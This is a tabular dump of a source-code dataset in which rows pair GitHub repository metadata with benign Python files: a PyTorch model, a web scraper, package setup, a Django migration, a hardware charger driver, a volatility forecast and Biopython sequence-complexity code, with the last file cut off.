hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2b8f31f3a6c54f4ea76713cf603b83eb2e6cd549 | 5,945 | py | Python | pytorch_wide_n_deep/usingpytorch.py | whatbeg/Data-Analysis | b1f878564448527ca730f6d869dc3cb0d9b678d7 | [
"Apache-2.0"
] | 1 | 2019-01-23T05:02:22.000Z | 2019-01-23T05:02:22.000Z | pytorch_wide_n_deep/usingpytorch.py | whatbeg/Data-Analysis | b1f878564448527ca730f6d869dc3cb0d9b678d7 | [
"Apache-2.0"
] | null | null | null | pytorch_wide_n_deep/usingpytorch.py | whatbeg/Data-Analysis | b1f878564448527ca730f6d869dc3cb0d9b678d7 | [
"Apache-2.0"
] | 3 | 2015-05-11T07:11:05.000Z | 2016-01-22T14:08:38.000Z | from __future__ import print_function
import numpy as np
import dataprocessing as proc
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
# Training settings
parser = argparse.ArgumentParser(description='BASE Model')
parser.add_argument('--batch-size', type=int, default=256, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=40, metavar='N',
help='number of epochs to train (default: 20)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
help='SGD momentum (default: 0.5)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=0, metavar='S',
help='random seed (default: 0)')
parser.add_argument('--log-interval', type=int, default=40, metavar='N',
help='how many batches to wait before logging training status')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.emb1 = nn.Embedding(9, 8, 0)
self.emb2 = nn.Embedding(16, 8, 0)
self.emb3 = nn.Embedding(2, 8, 0)
self.emb4 = nn.Embedding(6, 8, 0)
self.emb5 = nn.Embedding(42, 8, 0)
self.emb6 = nn.Embedding(15, 8, 0)
self.linear1 = nn.Linear(53, 100)
self.linear2 = nn.Linear(100, 50)
self.linear3 = nn.Linear(57, 2)
def forward(self, x):
wide_indices = Variable(torch.LongTensor([0, 1, 2, 3, 4, 5, 6]))
wide = torch.index_select(x, 1, wide_indices).float()
deep_indices = Variable(torch.LongTensor([16, 17, 18, 19, 20]))
x1 = self.emb1(x.select(1, 10))
x2 = self.emb2(x.select(1, 11))
x3 = self.emb3(x.select(1, 12))
x4 = self.emb4(x.select(1, 13))
x5 = self.emb5(x.select(1, 14))
x6 = self.emb6(x.select(1, 15))
x7 = torch.index_select(x.float(), 1, deep_indices).float()
deep = Variable(torch.cat([x1.data, x2.data, x3.data, x4.data, x5.data, x6.data, x7.data], 1))
deep = F.relu(self.linear1(deep))
deep = F.relu(self.linear2(deep))
x = Variable(torch.cat([wide.data, deep.data], 1))
x = self.linear3(x)
return F.log_softmax(x)
model = Net()
if args.cuda:
model.cuda()
# optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
def generate_data(data, label, batchSize, data_type='train', shuffle=True):
assert batchSize > 0
data_len = data.shape[0]
total_batch = data_len / batchSize + (1 if data_len % batchSize != 0 else 0)
if shuffle:
indices = np.random.permutation(data_len)
data = data[indices]
label = label[indices]
for idx in range(total_batch):
start = idx * batchSize
end = min((idx + 1) * batchSize, data_len)
if data_type == 'train':
yield data[start:end], label[start:end]
else:
yield data[start:end], label[start:end]
def train(epoch, train_data, train_labels, use_data_len=32561):
model.train() # set to training mode
batch_idx = 1
for (_data, _target) in generate_data(train_data[:use_data_len], train_labels[:use_data_len], batchSize=args.batch_size, shuffle=True):
data = torch.from_numpy(_data)
target = torch.from_numpy(_target).long()
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model.forward(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [Iteration {}] [{:5d}/{} ({:2d}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx, batch_idx * len(data), use_data_len,
int(100. * batch_idx * len(data) / use_data_len), loss.data[0]))
batch_idx += 1
def test(epoch, test_data, test_labels):
model.eval() # set to evaluation mode
test_loss = 0
correct = 0
for (data, target) in generate_data(test_data, test_labels,
batchSize=args.batch_size, shuffle=True):
data = torch.from_numpy(data)
target = torch.from_numpy(target).long()
if args.cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data, volatile=True), Variable(target)
output = model.forward(data)
test_loss += F.nll_loss(output, target).data[0]
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum()
test_loss = test_loss
test_loss /= test_data.shape[0] # loss function already averages over batch size
print('\nEpoch {} Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.1f}%)\n'.format(
epoch, test_loss, correct, test_data.shape[0], 100. * correct / test_data.shape[0]))
def go():
train_data, train_labels = proc.get_data("train")
test_data, test_labels = proc.get_data("test")
for epoch in range(1, args.epochs + 1):
train(epoch, train_data, train_labels, 32561)
test(epoch, test_data, test_labels)
if __name__ == '__main__':
go()
| 41 | 139 | 0.621699 | 1,308 | 0.220017 | 605 | 0.101766 | 0 | 0 | 0 | 0 | 850 | 0.142977 |
2b90c3926774337c71effdf292464f2dc4a520d0 | 1,152 | py | Python | test1.py | penghangph/python | 2a45e6ff8935a60731447ed3489ee410e9422f12 | [
"Apache-2.0"
] | null | null | null | test1.py | penghangph/python | 2a45e6ff8935a60731447ed3489ee410e9422f12 | [
"Apache-2.0"
] | null | null | null | test1.py | penghangph/python | 2a45e6ff8935a60731447ed3489ee410e9422f12 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# 爬虫抓学校官网首页
import requests
import re
import urllib.request
from bs4 import BeautifulSoup
import os
import lxml
# 保存文件
def file_save(data, path):
if not os.path.exists(os.path.split(path)[0]):
os.makedirs(os.path.split(path)[0])
try:
with open(path, 'wb') as f:
f.write(data.encode('utf-8'))
print('保存完毕')
except Exception as ex:
print('保存失败', ex)
def url_open(url):
# 伪造头部信息
headers = {
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
}
r = requests.get(url, headers)
_data = r.text
return _data
url = "http://www.yvtc.edu.cn"
data = url_open(url)
soup = BeautifulSoup(data, "lxml")
tag = soup.select('a[href^="/news/show"]')
s = ""
for item in tag:
s += item.get("href") + "," + item.get("title") + "\n"
print(s)
file_save(s, r"d:\1.txt") | 25.043478 | 134 | 0.600694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 486 | 0.402985 |
2b90fc8674ef1dbf04e090bf10431e1e1fe2bc12 | 1,464 | py | Python | setup.py | JimCircadian/model-ensembler | 68dc0cb80a2837209f51319fbbf29f62b49d19ed | [
"MIT"
] | 4 | 2021-02-19T13:05:59.000Z | 2021-12-13T12:40:55.000Z | setup.py | JimCircadian/model-ensembler | 68dc0cb80a2837209f51319fbbf29f62b49d19ed | [
"MIT"
] | 27 | 2021-06-24T11:06:18.000Z | 2022-03-31T20:26:51.000Z | setup.py | JimCircadian/model-ensembler | 68dc0cb80a2837209f51319fbbf29f62b49d19ed | [
"MIT"
] | null | null | null | import setuptools
from setuptools import setup
"""Setup module for model_ensembler
"""
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="model-ensembler",
version="0.5.2",
author="James Byrne",
author_email="jambyr@bas.ac.uk",
description="Model Ensemble for batch workflows on HPCs",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://www.github.com/jimcircadian/model-ensembler",
project_urls={
"Bug Tracker": "https://github.com/jimcircadian/model-ensembler/issues",
},
packages=setuptools.find_packages(),
keywords='slurm, hpc, tools, batch, model, ensemble',
classifiers=[
"Environment :: Console",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Intended Audience :: Science/Research",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX",
"Development Status :: 3 - Alpha",
"Topic :: System :: Distributed Computing",
],
entry_points={
'console_scripts': [
'model_ensemble=model_ensembler.cli:main',
],
},
python_requires='>=3.7, <4',
install_requires=[
"jinja2",
"jsonschema",
"pyyaml",
],
include_package_data=True,
)
| 28.705882 | 80 | 0.622951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 794 | 0.54235 |
2b91b64bcf9fb63e83545e349af03a180f049619 | 3,012 | py | Python | fun/fnotification/migrations/0001_initial.py | larryw3i/osp | d9526a179876053a6b93e5a110d2de730376f511 | [
"MIT"
] | 1 | 2022-01-01T11:14:58.000Z | 2022-01-01T11:14:58.000Z | fun/fnotification/migrations/0001_initial.py | larryw3i/osp | d9526a179876053a6b93e5a110d2de730376f511 | [
"MIT"
] | null | null | null | fun/fnotification/migrations/0001_initial.py | larryw3i/osp | d9526a179876053a6b93e5a110d2de730376f511 | [
"MIT"
] | null | null | null | # Generated by Django 4.0 on 2022-01-13 10:17
import uuid
import ckeditor_uploader.fields
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('funuser', '0004_alter_funuser_avatar'),
('auth', '0012_alter_user_first_name_max_length'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Fnotification',
fields=[
('id',
models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
serialize=False,
unique=True)),
('title',
models.CharField(
max_length=64,
verbose_name='Title')),
('content',
ckeditor_uploader.fields.RichTextUploadingField(
max_length=2048,
verbose_name='Content')),
('additional_files',
models.FileField(
help_text='If you have more than one file, please package them and upload them.',
upload_to='',
verbose_name='Additional files')),
('DOC',
models.DateTimeField(
auto_now_add=True,
verbose_name='Date of creating')),
('DOU',
models.DateTimeField(
auto_now=True,
verbose_name='Date of updating')),
('comment',
models.TextField(
max_length=128,
verbose_name='Comment')),
('groups',
models.ManyToManyField(
blank=True,
help_text='The groups this notification belongs to. all user of specific groups will receive notification. for all users if groups is null',
related_name='notification_set',
related_query_name='notification',
to='auth.Group',
verbose_name='groups')),
('poster',
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to='funuser.funuser',
verbose_name='Author')),
('readers',
models.ManyToManyField(
blank=True,
related_name='reader_set',
related_query_name='reader',
to=settings.AUTH_USER_MODEL,
verbose_name='Reader')),
],
options={
'verbose_name': 'Notification',
'verbose_name_plural': 'Notifications',
},
),
]
| 35.857143 | 161 | 0.479748 | 2,810 | 0.932935 | 0 | 0 | 0 | 0 | 0 | 0 | 672 | 0.223108 |
2b9247e4df10a952e35c2f7d168d1b670abd566a | 3,919 | py | Python | flight_computer/lib/bq25883.py | stanford-ssi/sequoia-software | 63b023e229c65f2a12e365366442fab3b196817f | [
"MIT"
] | 4 | 2020-09-16T02:19:34.000Z | 2021-02-07T03:10:50.000Z | flight_computer/lib/bq25883.py | stanford-ssi/sequoia-software | 63b023e229c65f2a12e365366442fab3b196817f | [
"MIT"
] | 33 | 2020-09-24T06:52:37.000Z | 2021-02-25T03:29:51.000Z | flight_computer/lib/bq25883.py | stanford-ssi/sequoia-software | 63b023e229c65f2a12e365366442fab3b196817f | [
"MIT"
] | 2 | 2021-02-07T03:10:53.000Z | 2022-01-07T06:06:15.000Z | """
`bq25883`
====================================================
CircuitPython driver for the BQ25883 2-cell USB boost-mode charger.
* Author(s): Max Holliday
Implementation Notes
--------------------
"""
from micropython import const
from adafruit_bus_device.i2c_device import I2CDevice
from adafruit_register.i2c_struct import ROUnaryStruct, UnaryStruct
from adafruit_register.i2c_bits import ROBits, RWBits
from adafruit_register.i2c_bit import ROBit, RWBit
# Registers
_BATV_LIM = const(0x00)
_CHRGI_LIM = const(0x01)
_VIN_LIM = const(0x02)
_IIN_LIM = const(0x03)
_TERM_CTRL = const(0x04)
_CHRGR_CRTL1 = const(0x05)
_CHRGR_CRTL2 = const(0x06)
_CHRGR_CRTL3 = const(0x07)
_CHRGR_CRTL4 = const(0x08)
_OTG_CTRL = const(0x09)
_ICO_LIM = const(0x0A)
_CHRG_STAT1 = const(0x0B)
_CHRG_STAT2 = const(0x0C)
_NTC_STAT = const(0x0D)
_FAULT_STAT = const(0x0E)
_CHRGR_FLAG1 = const(0x0F)
_CHRGR_FLAG2 = const(0x10)
_FAULT_FLAG = const(0x11)
_CHRGR_MSK1 = const(0x12)
_CHRGR_MSK2 = const(0x13)
_FAULT_MSK = const(0x14)
_ADC_CTRL = const(0x15)
_ADC_FN_CTRL = const(0x16)
_IBUS_ADC1 = const(0x17)
_IBUS_ADC0 = const(0x18)
_ICHG_ADC1 = const(0x19)
_ICHG_ADC0 = const(0x1A)
_VBUS_ADC1 = const(0x1B)
_VBUS_ADC0 = const(0x1C)
_VBAT_ADC1 = const(0x1D)
_VBAT_ADC0 = const(0x1E)
_VSYS_ADC1 = const(0x1F)
_VSYS_ADC0 = const(0x20)
_TS_ADC1 = const(0x21)
_TS_ADC0 = const(0x22)
_TDIE_ADC1 = const(0x23)
_TDIE_ADC0 = const(0x24)
_PART_INFO = const(0x25)
def _to_signed(num):
if num > 0x7FFF:
num -= 0x10000
return num
class BQ25883:
_pn = ROBits(4,_PART_INFO,3,1,False)
_fault_status = ROBits(8,_FAULT_STAT,0,1,False)
_chrgr_status1 = ROBits(8,_CHRG_STAT1,0,1,False)
_chrgr_status2 = ROBits(8,_CHRG_STAT2,0,1,False)
_chrg_status = ROBits(3,_CHRG_STAT1,0,1,False)
_otg_ctrl = ROBits(8,_OTG_CTRL,0,1,False)
_chrg_ctrl2 = ROBits(8,_CHRGR_CRTL2,0,1,False)
_wdt = RWBits(2,_CHRGR_CRTL1,4,1,False)
_ntc_stat = RWBits(3,_NTC_STAT,0,1,False)
_pfm_dis = RWBit(_CHRGR_CRTL3,7,1,False)
_en_chrg = RWBit(_CHRGR_CRTL2, 3, 1, False)
_reg_rst = RWBit(_PART_INFO, 7, 1, False)
_stat_dis = RWBit(_CHRGR_CRTL1, 6, 1, False)
_inlim = RWBit(_CHRGI_LIM, 6, 1, False)
def __init__(self, i2c_bus, addr=0x6B):
self.i2c_device = I2CDevice(i2c_bus, addr)
self.i2c_addr = addr
assert self._pn == 3, "Unable to find BQ25883"
@property
def status(self):
print('Fault:',bin(self._fault_status))
print('Charger Status 1:',bin(self._chrgr_status1))
print('Charger Status 2:',bin(self._chrgr_status2))
print('Charge Status:',bin(self._chrg_status))
print('Charge Control2:',bin(self._chrg_ctrl2))
print('NTC Status:',bin(self._ntc_stat))
print('OTG:',hex(self._otg_ctrl))
@property
def charging(self):
print('Charge Control2:',bin(self._chrg_ctrl2))
@charging.setter
def charging(self,value):
assert type(value) == bool
self._en_chrg=value
@property
def wdt(self):
print('Watchdog Timer:',bin(self._wdt))
@wdt.setter
def wdt(self,value):
if not value:
self._wdt=0
else:
self._wdt=value
@property
def led(self):
print('Status LED:',bin(self._stat_dis))
@led.setter
def led(self,value):
assert type(value) == bool
self._stat_dis=not value | 31.861789 | 68 | 0.588671 | 2,117 | 0.540189 | 0 | 0 | 1,014 | 0.258739 | 0 | 0 | 404 | 0.103088 |
2b92b611127a05b1d87d98fdcdf787a237a82dc6 | 129 | py | Python | faced/const.py | hseguro/faced | 4ad42c54fb8e8679fb5feda30af5db3ac74ccc8c | [
"MIT"
] | 575 | 2018-08-27T18:30:53.000Z | 2022-03-31T03:25:36.000Z | faced/const.py | 18718615232/faced | 31ef0d30e1567a06113f49ff4a1202760d952df2 | [
"MIT"
] | 35 | 2018-09-04T08:16:59.000Z | 2022-02-03T18:28:29.000Z | faced/const.py | 18718615232/faced | 31ef0d30e1567a06113f49ff4a1202760d952df2 | [
"MIT"
] | 172 | 2018-08-31T16:55:50.000Z | 2022-02-28T12:03:58.000Z | import os
MODELS_PATH = os.path.join(os.path.dirname(__file__), "models")
YOLO_SIZE = 288
YOLO_TARGET = 9
CORRECTOR_SIZE = 50
| 14.333333 | 63 | 0.744186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.062016 |
2b94150c3b79e3074d21274247ea053c2cb884e0 | 178 | py | Python | scripts/core/pass_types.py | evolving-dev/holo | d8ef8dd58302d9f2589e5d2b3011015ff145528d | [
"MIT"
] | null | null | null | scripts/core/pass_types.py | evolving-dev/holo | d8ef8dd58302d9f2589e5d2b3011015ff145528d | [
"MIT"
] | null | null | null | scripts/core/pass_types.py | evolving-dev/holo | d8ef8dd58302d9f2589e5d2b3011015ff145528d | [
"MIT"
] | null | null | null | class HoloResponse:
def __init__(self, success, response=None):
self.success = success
if response != None:
self.response = response
| 17.8 | 48 | 0.578652 | 176 | 0.988764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2b946538ca5653fc5a315cf1136426e8c8360806 | 1,418 | py | Python | volatility/models.py | larrys54321/quant_corner | 3dc6f3f3d1ce1fa002c226bd5c5f845b91710687 | [
"MIT"
] | null | null | null | volatility/models.py | larrys54321/quant_corner | 3dc6f3f3d1ce1fa002c226bd5c5f845b91710687 | [
"MIT"
] | null | null | null | volatility/models.py | larrys54321/quant_corner | 3dc6f3f3d1ce1fa002c226bd5c5f845b91710687 | [
"MIT"
] | null | null | null | import yfinance as yf
from datetime import datetime
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from arch import arch_model
from volatility.utils import get_percent_chg
start = datetime(2000, 1, 1)
end = datetime(2020, 9, 11)
symbol = 'SPY'
tickerData = yf.Ticker(symbol)
df = tickerData.history(period='1d', start=start, end=end)
get_percent_chg(df, 1)
get_percent_chg(df, 5)
get_percent_chg(df, 10)
get_percent_chg(df, 15)
get_percent_chg(df, 21)
returns = df.Close.pct_change().dropna()
df['ret_1a'] = returns
test_size = 365*5
test_size = 365
keyList = ['ret_1', 'ret_5', 'ret_10', 'ret_15', 'ret_21']
fig, ax = plt.subplots(figsize=(10, 5), nrows=5, ncols=1)
k = 0
for key in keyList:
returns = 100 * df[key].dropna()
predictions = []
print('key', key)
for i in range(test_size):
train = returns[:-(test_size-i)]
model = arch_model(train, p=2, q=2)
model_fit = model.fit(disp='off')
pred_val = model_fit.forecast(horizon=1)
predictions.append(np.sqrt(pred_val.variance.values[-1,:][0]))
predictions = pd.Series(predictions, index=returns.index[-test_size:])
ax[k].plot(returns[-test_size:], label=key, color='r')
ax[k].plot(predictions, label=key+' volpred', color='b')
ax[k].set_ylabel(key)
k += 1
ax[k-1].set_xlabel('Date')
plt.legend(['True Returns', 'Predicted Volatility'], loc=2, fontsize=8)
plt.show() | 32.227273 | 74 | 0.685472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 123 | 0.086742 |
2b95c55be0557da724a633f006455d098498c600 | 5,880 | py | Python | Bio/SeqUtils/lcc.py | barendt/biopython | 391bcdbee7f821bff3e12b75c635a06bc1b2dcea | [
"PostgreSQL"
] | 1 | 2016-05-09T13:17:59.000Z | 2016-05-09T13:17:59.000Z | Bio/SeqUtils/lcc.py | cymon/biopython-github-master | 7be9697599296401b0a7126d23b5eda391a94116 | [
"PostgreSQL"
] | null | null | null | Bio/SeqUtils/lcc.py | cymon/biopython-github-master | 7be9697599296401b0a7126d23b5eda391a94116 | [
"PostgreSQL"
] | null | null | null | # Copyright 2003, 2007 by Sebastian Bassi. sbassi@genesdigitales.com
# All rights reserved. This code is part of the Biopython
# distribution and governed by its license.
# Please see the LICENSE file that should have been included as part
# of this package.
import math
def lcc_mult(seq,wsize):
"""Local Composition Complexity (LCC) values over sliding window.
Returns a list of floats, the LCC values for a sliding window over
the sequence.
seq - an unambiguous DNA sequence (a string or Seq object)
wsize - window size, integer
The result is the same as applying lcc_simp multiple times, but this
version is optimized for speed. The optimization works by using the
value of previous window as a base to compute the next one."""
l2=math.log(2)
tamseq=len(seq)
try:
#Assume its a string
upper = seq.upper()
except AttributeError:
#Should be a Seq object then
upper = seq.tostring().upper()
compone=[0]
lccsal=[0]
for i in range(wsize):
compone.append(((i+1)/float(wsize))*
((math.log((i+1)/float(wsize)))/l2))
window=seq[0:wsize]
cant_a=window.count('A')
cant_c=window.count('C')
cant_t=window.count('T')
cant_g=window.count('G')
term_a=compone[cant_a]
term_c=compone[cant_c]
term_t=compone[cant_t]
term_g=compone[cant_g]
lccsal.append(-(term_a+term_c+term_t+term_g))
tail=seq[0]
for x in range (tamseq-wsize):
window=upper[x+1:wsize+x+1]
if tail==window[-1]:
lccsal.append(lccsal[-1])
elif tail=='A':
cant_a=cant_a-1
if window.endswith('C'):
cant_c=cant_c+1
term_a=compone[cant_a]
term_c=compone[cant_c]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('T'):
cant_t=cant_t+1
term_a=compone[cant_a]
term_t=compone[cant_t]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('G'):
cant_g=cant_g+1
term_a=compone[cant_a]
term_g=compone[cant_g]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif tail=='C':
cant_c=cant_c-1
if window.endswith('A'):
cant_a=cant_a+1
term_a=compone[cant_a]
term_c=compone[cant_c]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('T'):
cant_t=cant_t+1
term_c=compone[cant_c]
term_t=compone[cant_t]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('G'):
cant_g=cant_g+1
term_c=compone[cant_c]
term_g=compone[cant_g]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif tail=='T':
cant_t=cant_t-1
if window.endswith('A'):
cant_a=cant_a+1
term_a=compone[cant_a]
term_t=compone[cant_t]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('C'):
cant_c=cant_c+1
term_c=compone[cant_c]
term_t=compone[cant_t]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('G'):
cant_g=cant_g+1
term_t=compone[cant_t]
term_g=compone[cant_g]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif tail=='G':
cant_g=cant_g-1
if window.endswith('A'):
cant_a=cant_a+1
term_a=compone[cant_a]
term_g=compone[cant_g]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('C'):
cant_c=cant_c+1
term_c=compone[cant_c]
term_g=compone[cant_g]
lccsal.append(-(term_a+term_c+term_t+term_g))
elif window.endswith('T'):
cant_t=cant_t+1
term_t=compone[cant_t]
term_g=compone[cant_g]
lccsal.append(-(term_a+term_c+term_t+term_g))
tail=window[0]
return lccsal
def lcc_simp(seq):
"""Local Composition Complexity (LCC) for a sequence.
seq - an unambiguous DNA sequence (a string or Seq object)
Returns the Local Composition Complexity (LCC) value for the entire
sequence (as a float).
Reference:
Andrzej K Konopka (2005) Sequence Complexity and Composition
DOI: 10.1038/npg.els.0005260
"""
wsize=len(seq)
try:
#Assume its a string
upper = seq.upper()
except AttributeError:
#Should be a Seq object then
upper = seq.tostring().upper()
l2=math.log(2)
if 'A' not in seq:
term_a=0
# Check to avoid calculating the log of 0.
else:
term_a=((upper.count('A'))/float(wsize))*((math.log((upper.count('A'))
/float(wsize)))/l2)
if 'C' not in seq:
term_c=0
else:
term_c=((upper.count('C'))/float(wsize))*((math.log((upper.count('C'))
/float(wsize)))/l2)
if 'T' not in seq:
term_t=0
else:
term_t=((upper.count('T'))/float(wsize))*((math.log((upper.count('T'))
/float(wsize)))/l2)
if 'G' not in seq:
term_g=0
else:
term_g=((upper.count('G'))/float(wsize))*((math.log((upper.count('G'))
/float(wsize)))/l2)
lccsal=-(term_a+term_c+term_t+term_g)
return lccsal
| 36.07362 | 78 | 0.541667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,298 | 0.220748 |
2b96e0991964b2437d682f1fd12e74f747085a34 | 302 | py | Python | skippa/__init__.py | data-science-lab-amsterdam/skippa | 1349317c441f1e46e22f4c02a8aceae767aea5fe | [
"BSD-3-Clause"
] | 33 | 2021-12-15T22:56:12.000Z | 2022-02-26T12:33:56.000Z | skippa/__init__.py | data-science-lab-amsterdam/skippa | 1349317c441f1e46e22f4c02a8aceae767aea5fe | [
"BSD-3-Clause"
] | null | null | null | skippa/__init__.py | data-science-lab-amsterdam/skippa | 1349317c441f1e46e22f4c02a8aceae767aea5fe | [
"BSD-3-Clause"
] | 1 | 2022-01-20T15:41:35.000Z | 2022-01-20T15:41:35.000Z | """Top-level package for skippa.
The pipeline module defines the main Skippa methods
The transformers subpackage contains various transformers used in the pipeline.
"""
__author__ = """Robert van Straalen"""
__email__ = 'tech@datasciencelab.nl'
from .pipeline import Skippa, SkippaPipeline, columns
| 27.454545 | 79 | 0.788079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 218 | 0.721854 |
2b9799f7570f968fd082853bb9689a42c333baf1 | 115 | py | Python | mini-scripts/Python_Casting_(float).txt.py | Web-Dev-Collaborative/PYTHON_PRAC | 856f902fb43dcccae168d34ee6aacc02427a7ac6 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | mini-scripts/Python_Casting_(float).txt.py | Web-Dev-Collaborative/PYTHON_PRAC | 856f902fb43dcccae168d34ee6aacc02427a7ac6 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | mini-scripts/Python_Casting_(float).txt.py | Web-Dev-Collaborative/PYTHON_PRAC | 856f902fb43dcccae168d34ee6aacc02427a7ac6 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | x = float(1)
y = float(2.8)
z = float("3")
w = float("4.2")
print(x)
print(y)
print(z)
print(w)
# Author: Bryan G
| 11.5 | 18 | 0.573913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.226087 |
2b97ae2edf5d76e8856d7d9435e4757b132c023d | 5,833 | py | Python | Grid.py | ivcafe413/corinthian-football | 7374f4439bc58085bc50bcd1fb7fb7973c5a1515 | [
"MIT"
] | null | null | null | Grid.py | ivcafe413/corinthian-football | 7374f4439bc58085bc50bcd1fb7fb7973c5a1515 | [
"MIT"
] | null | null | null | Grid.py | ivcafe413/corinthian-football | 7374f4439bc58085bc50bcd1fb7fb7973c5a1515 | [
"MIT"
] | null | null | null | import logging
import random
from collections import namedtuple
from typing import NamedTuple
from queue import PriorityQueue
from objects import BaseObject
from constants import NORTH, SOUTH, EAST, WEST
Space = namedtuple("Space", ["x", "y"])
# TODO: Big TODO - Re-implement space with z/t value for terrain???
# SpaceMeta = namedtuple("SpaceMeta", ["actor", "terrain"], defaults=[None, "Blank"])
class SpaceMeta(NamedTuple):
actor: BaseObject
terrain: str = "Blank"
DIRECTIONS = [NORTH, SOUTH, WEST, EAST] # Maintained order, just cuz
GRID_DIRECTIONS = [Space(0, -1), Space(0, 1), Space(-1, 0), Space(1, 0)]
def grid_direction(direction: int) -> Space:
return GRID_DIRECTIONS[direction]
def grid_space_add(a: Space, b: Space) -> Space:
sum_x = a.x + b.x
sum_y = a.y + b.y
return Space(sum_x, sum_y)
def grid_space_neighbor(space: Space, direction: int) -> Space:
return grid_space_add(space, grid_direction(direction))
class Grid(dict):
def __setitem__(self, key, values):
x,y = key
# print(values)
super().__setitem__(Space(x, y), SpaceMeta(*values))
def __getitem__(self, key) -> SpaceMeta:
x,y = key
return super().__getitem__(Space(x, y))
def neighbors(self, space: Space):
# space = Space(coordinates)
for d in DIRECTIONS:
neighbor = grid_space_neighbor(space, d)
if neighbor in self:
neighbor_object = self[neighbor].actor
if neighbor_object is None or not neighbor_object.solid: # Can't traverse through solid objects
yield neighbor
